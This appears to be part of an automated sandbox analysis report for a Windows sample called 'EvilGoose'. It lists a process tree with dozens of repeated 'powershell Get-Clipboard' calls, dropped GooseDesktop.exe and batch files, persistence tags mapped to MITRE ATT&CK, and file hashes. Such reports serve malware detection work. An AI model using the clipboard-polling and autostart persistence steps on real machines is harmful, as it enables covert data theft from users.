-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4996
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:392
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:1624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:1380
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:3608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:3136
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:1824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:3440
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:1520
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:1216
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:1464
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:3324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2868
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2044
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:3256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2556
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:32
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:1700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2524
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:3792
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2296
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:3412
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:5100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:5116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2972
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:740
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4636
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:1420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:1344
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:1004
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4640
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2940
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:3560
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:1284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2332
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:3100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2952
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:1676
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4144
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:5100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4928
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:3020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4368
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:432
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:3584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4276
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4360
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x508 0x51c1⤵PID:1932
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\5d3f71723c5e464aa1a06259e50323c0 /t 1440 /p 18041⤵PID:396
-
C:\Windows\system32\BackgroundTaskHost.exe"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider1⤵PID:2700
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}1⤵PID:4400
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1824
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵PID:3232
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault52e6eeach2d99h4d8dh8d4fh8968a3b876e11⤵PID:3660
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffeb42b46f8,0x7ffeb42b4708,0x7ffeb42b47182⤵PID:4440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,3842724958874636157,7929843078658686211,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:22⤵PID:4784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,3842724958874636157,7929843078658686211,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:32⤵PID:1320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,3842724958874636157,7929843078658686211,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:82⤵PID:2748
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4628
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵PID:1316
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault38459c21h7750h4fc5hb430h1194dc23eeba1⤵PID:4268
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xfc,0x128,0x7ffeb42b46f8,0x7ffeb42b4708,0x7ffeb42b47182⤵PID:4772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,9232472314397068478,9976419592407669725,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:22⤵PID:3212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,9232472314397068478,9976419592407669725,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:32⤵PID:1176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,9232472314397068478,9976419592407669725,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:82⤵PID:4168
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4492
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3316
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4200
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\TestEnter.bat" "1⤵PID:4400
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\TestEnter.bat" "1⤵PID:2104
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\ShowFormat.jpg" /ForceBootstrapPaint3D1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2560
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc1⤵
- Drops file in System32 directory
PID:3376
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1292
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Pictures\My Wallpaper.jpg" /ForceBootstrapPaint3D1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3760
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1344
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding1⤵PID:1012
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\CloseGoose.bat" "1⤵PID:3628
-
C:\Windows\system32\taskkill.exetaskkill /f /im goosedesktop.exe2⤵
- Kills process with taskkill
PID:1344
-
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\main.ps1"1⤵
- Opens file in notepad (likely ransom note)
PID:4968
-
C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe"C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3792
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\CloseGoose.bat" "1⤵PID:3316
-
C:\Windows\system32\taskkill.exetaskkill /f /im goosedesktop.exe2⤵
- Kills process with taskkill
PID:4332
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
78KB
MD52cfd3dd20571cce21f09407b28b565fb
SHA107a7704986e963e9ba69f7109b7450deccd23eb2
SHA256c9eb076f465aac3c93c61f34fb7cfef6677bacbab7e0611c1c41b80b7f057792
SHA512bec2ec4d1562c45aaa276e1687786ccd494afefe93dfa330c600e2ad8ac6783ea7988c284df42c5c811afc5d73686484012584faf553e9777f4cb0b7ad436e7d
-
Filesize
33KB
MD5c555604e8b6f818991e186342f856b1b
SHA13ae02db8eba2f4fa30cb7567a9f5bf8346faded0
SHA256012da30b247a7964a3bdaaaeec8a6fb5559d7047ab8f1bcc0a2a785aad978972
SHA51201a6c8f91d1eedd0d83b654059844aa7ed16e76abfce54183b5bf484edb6cb33e0ebe317987a3143e94c23ef60954ced0e32378a1a5f80f8412c7029e4303bbe
-
Filesize
1KB
MD5f0f11cd478cc44d518c16820ede9d253
SHA1cfaf8d2e071f2ade0894578e5b44e02032d27be4
SHA256321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb
SHA512ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
152B
MD58b167567021ccb1a9fdf073fa9112ef0
SHA13baf293fbfaa7c1e7cdacb5f2975737f4ef69898
SHA25626764cedf35f118b55f30b3a36e0693f9f38290a5b2b6b8b83a00e990ae18513
SHA512726098001ef1acf1dd154a658752fa27dea32bca8fbb66395c142cb666102e71632adbad1b7e2f717071cd3e3af3867471932a71707f2ae97b989f4be468ab54
-
Filesize
152B
MD5537815e7cc5c694912ac0308147852e4
SHA12ccdd9d9dc637db5462fe8119c0df261146c363c
SHA256b4b69d099507d88abdeff4835e06cc6711e1c47464c963d013cef0a278e52d4f
SHA51263969a69af057235dbdecddc483ef5ce0058673179a3580c5aa12938c9501513cdb72dd703a06fa7d4fc08d074f17528283338c795334398497c771ecbd1350a
-
Filesize
5KB
MD583bd19b5f527faa0db7a98fe3e75fd40
SHA12b62e33b56390dbb5846f6ef4a658e9cbf07b857
SHA256e757b14ab35263d70a1648db65414a00af3937e4d103373c3cd06d83a3fe197c
SHA512c2dee11a50fe2017ad48925dc9ec2d7c0d3412a746313583f43c522d4d7077e3a091a4e032816e992640e81f48b4583cd0c82320fb8a6593ab024edc647a8c33
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
8KB
MD50082c8bfdbaa02538ade9f6f6b3ad91a
SHA1fc1638ad73c01f106e0de926f38d982475c30329
SHA2567c0f1ab3735a5bce58635317157a00730c7e6fde1d0111344783bb489b040982
SHA512b813ec1268f1583fb4b9c0daf3a0a131160153c354b416874bf57a22ce2ab3c8a8103f98d062e936f6615196e815f2e58b8dd5804b76612c01f2fdd99e50e14c
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
1KB
MD58d460ce715a00afd56cda62e926b8b17
SHA13aa1ed2a3cd5e6e1a3240f222492c9e49c4eaf22
SHA256195c9d4857b9486e312f80264b31ef7e9ba014ececd7731397ee75ce8d8f38cb
SHA5121b9efe45bea12e59e552dcce73d597ad431aa274621d96e5a3d146e28cfb11d9f5af256f0bc986e8d4d043f6352b9410d01ddb048bd57445f544502eaf28d969
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
64B
MD55ad057f22389d36eb38a18d31efe295b
SHA1e8668017f1339dc8496c087295f79516dce8e9bf
SHA256205049c83211067b8e11e2fe83e6224dc966c33fee28fc4643efa55d069b41f3
SHA5123169c4d8d2e695debce2f47a0285c9b9b11913392f7ab9911f9530bf13ba94531bb2713becce0d616872263d6fab8097848f28894bf1594ec1e81aa20049cd2a
-
Filesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
Filesize
64B
MD55c10ece9e67c1d50ee9b458aa8cc169a
SHA145fce8c44fd825126ba098ff354a53474a17f9f0
SHA25671ca49efcebb0543a909d0239c210d1e4480f244e5be344f0d511b2c1ef430b0
SHA51279392ee8c5c61eecde85ee2dc3baacfc351b569f1e96d81493d5ba82c70032efd75143565e4f121ec971e295c822ed5e25a18fa61c1378f53b1f96c42f86fa45
-
Filesize
64B
MD5feadc4e1a70c13480ef147aca0c47bc0
SHA1d7a5084c93842a290b24dacec0cd3904c2266819
SHA2565b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac
SHA512c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23
-
Filesize
1KB
MD529fd7ba4c4365599ebc5c52cd71c171c
SHA16d7413709b5532115a116b1f0e7f4b791e2d4ab0
SHA2568607711dbf3a10f36f5a05c8ef53d6aeb1c0683420fc6ad5b2990fc043909850
SHA512884d9e7817638f28cfbb8a9cd7ffb5252b94197206fca94f89bb3042127d1e22c5d52a97d6df8d4b16dbacdb20029a025fdd1c60f180e59ca6a3453a5bbf6987
-
Filesize
64B
MD5b16dc67d8633fb86f9d9dc491097150e
SHA10ea564df2675c5e2a82449530dd070ad855dfcd6
SHA256378c51f20fe67c7ef650d594dca84dd39f8eaeb28876fe783bb3f98394bb494b
SHA512c41852fc8c6728dce8aaa7d9104b39c9e9a6bdcc0354ff5e0d0bff3c055b9aebbb080111c90f6b70db28a1e81b8ca1e3cfec4f8a4f6e59a75188215c21788cdd
-
Filesize
1.4MB
MD556192831a7f808874207ba593f464415
SHA1e0c18c72a62692d856da1f8988b0bc9c8088d2aa
SHA2566aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
SHA512c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33
-
Filesize
398KB
MD5eac919eb1e9ebdac0c2529ef769736ce
SHA124de10fc0763417aed6b020a1ff226a656339028
SHA2569ab12e452de8f41040b914d7791e533d0847d09e6be90065a784b907181057db
SHA512b2bf74a79f800a1ae70fadc7badcbc42dcd776a6da8193789b5cdb236ee96e8e0a06b582d271fc0b98c51353c5ee8ceb7d03640bba7201f5c071313798424718
-
Filesize
6.3MB
MD5ecd3eedd1f783552e35f5bec18887ff7
SHA1ab75a39baf2311570db5a4d90566a8746fdecc01
SHA256652b3eb51dfc7cdd774b5c1103d69ae6c820190159d64cb477a4836096a639d7
SHA51214351e2f978f762982fd91f9e9ce6164f02e445b9de839ed603df67f0502863d6d34551401b675bd486d568adf509543fa55ac15eb7a1d77c2fd88ced109f994
-
Filesize
4KB
MD55436e6aebabf071c1d832071a01b8bcd
SHA1c7b19e1afcaaea7cc2db55d4ef74f25c0f3603e2
SHA2562bf822b86e4adabce83a796de15fbbfeb75ff82c3bc1ed2a0f5286962915d362
SHA512dd1851bb2d6ea5217f59974270ed59b0d7c758c862a333dcf455d43e03ba4c4484a86596c4a7b1ed46c3c671da5ede356ff5c4f7f9d93746d119f4d4332fd204
-
Filesize
5KB
MD5db2b7cf36003b2b653df6f3ca986e007
SHA1d61a94c7b965dec3daa6351d849fa22f646edf8b
SHA25656a240ddfbb494a6cb5c02a1271b5cc9a79217c53b481d9d3240b4973808d65b
SHA5123c5ba0484567bd520334837c54df160b26d3a3be952474aedf23a946369bada58241dc43a471d8e9e652e0b682599f1c5dbd03e39fe8c1f6182b806b6939eef3
-
Filesize
11KB
MD53b86bf25cd702a3a071590f088fabf64
SHA131b279bca59916ba8202b029e7b7b808981a52be
SHA2567c8864e0b63969e2469c2d80cd855648044cd15fd89dbabd275954efb7ef6879
SHA512b63b24259b6a2acb01f7d066fa10c5ddf4237b0deebab4e4389a40ee677ffb232baa0f3029f47e388eb1f6fbcf97f4a640e41b594ce9f0c41a841b97e471e214
-
Filesize
5KB
MD5bcd1908ce864cb01a222b5cc791d7758
SHA1fd1f938c0497cf8cf81832843a58db3ae13eb4d9
SHA256e4b86c31838511199dac9eb6e0507736ee461b0edaa4bf9351142c534f2c2e8e
SHA5128e883b8d54f9461d1f9dfae64cab391c17b405b6ce351648aa420f0a589def8a4f6d135f3bfb12158aa66df67d4d7b056f0ff3d80c052bf8dc0e1b31a670f759
-
Filesize
13KB
MD5b2354d238829d09c54e272d8b4f60189
